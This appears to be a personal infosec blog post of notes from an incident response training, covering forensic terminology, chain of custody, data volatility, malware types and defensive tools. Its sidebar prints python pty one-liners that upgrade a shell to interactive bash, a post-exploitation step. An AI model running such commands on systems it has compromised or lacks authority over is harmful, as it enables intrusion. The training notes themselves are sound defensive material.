akde/infosec

Information security is ultimately about managing risk

Notes from the Incident Response Training March 2025

  • Since Win­dows 11, hard dri­ve encryp­tion can be applied auto­mat­i­cal­ly if Win­dows detects that the require­ments are met. Users could not be aware that their stor­age may be encrypted.
  • CAINE can be used for first analysis
  • Schrödinger’s Inci­dent — we know if it is an inci­dent now before we’ve looked into it.
  • Ter­mi­nol­o­gy:
    • Inci­dent Analysis 
      • Impact analy­sis
    • Inci­dent Response 
      • Imme­di­ate reactions
      • Man­dia et al. 2003 and “The inves­tiga­tive process” by Casey, 2004
    • Inci­dent Handling 
      • Controlling/Management
    • FPC Full Pack­et Captures
    • PSTR Pack­et Strings (Log only from strings of net­work packets)
  • Chain of cus­tody — doc­u­men­ta­tion of all steps and insights and where and how they were retrieved. Impor­tant when it goes to court.
  • Types of data 
    • Per­sis­tent data
    • Volatile Data
    • Very Volatile Data
  • (!) After pacht­ing for a zero day, you should also check if the sys­tems were already compromised.
  • Spe­cial­ized mal­ware types: 
    • Scare­ware — Mal­i­cous soft­ware which threat­ens a user. For exam­ple, it is claim­ing an infec­tion, the relase of sen­si­ble data, … And it offers a path to pay some­thing to not real­ize the threat.
    • Adware — Mal­i­cous soft­ware which loads adver­tise­ment so that ad plat­forms reg­is­ter traffic.
    • Spy­ware — Mali­cious soft­ware which only col­lects and dis­trib­utes sen­si­tive data.
  • Time­zones are impo­rant to con­sid­er when doc­u­ment­ing inci­dents. Make sure that you are using only one time zone and check which time zone tools are using.
  • There are Emo­ji-Domains
  • Search also for base64 patterns
  • Net­work pack­age data can be very use­ful, but to store it for a longer time peri­od is very ressource inten­sive, obviously. 
    • Flow data can be a com­pro­mise, to only log for some time which sys­tems talked to which oth­er systems.
  • Logs should be pro­tect­ed like back­ups, also after an suc­cess­ful attack.
  • GitHub — red­ca­naryco/atom­ic-red-team: Small and high­ly portable detec­tion tests based on MITRE’s ATT&CK. Atom­ic Red Team test library
  • Suri­ca­ta — net­work ana­lyz­ing tool
  • CFReDS Por­tal is a page for image which can be ana­lyzed with filesys­tem forensic.
  • With GitHub — fox-it/dis­sect: Dis­sect is a dig­i­tal foren­sics & inci­dent response frame­work and toolset that allows you to quick­ly access and analyse foren­sic arte­facts from var­i­ous disk and file for­mats, devel­oped by Fox-IT (part of NCC Group). you can scan images for inter­est­ing files
  • See Foren­sic site with tools to learn
  • Most mal­ware wants to per­sist itself. There­fore, it is a good idea to search the pos­si­ble per­sis­tence vec­tors.
  • Tip: When han­del­ing with files, change the suf­fix to pre­vent acci­dent­ly exe­cu­tion. E.g. bla.exe_

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';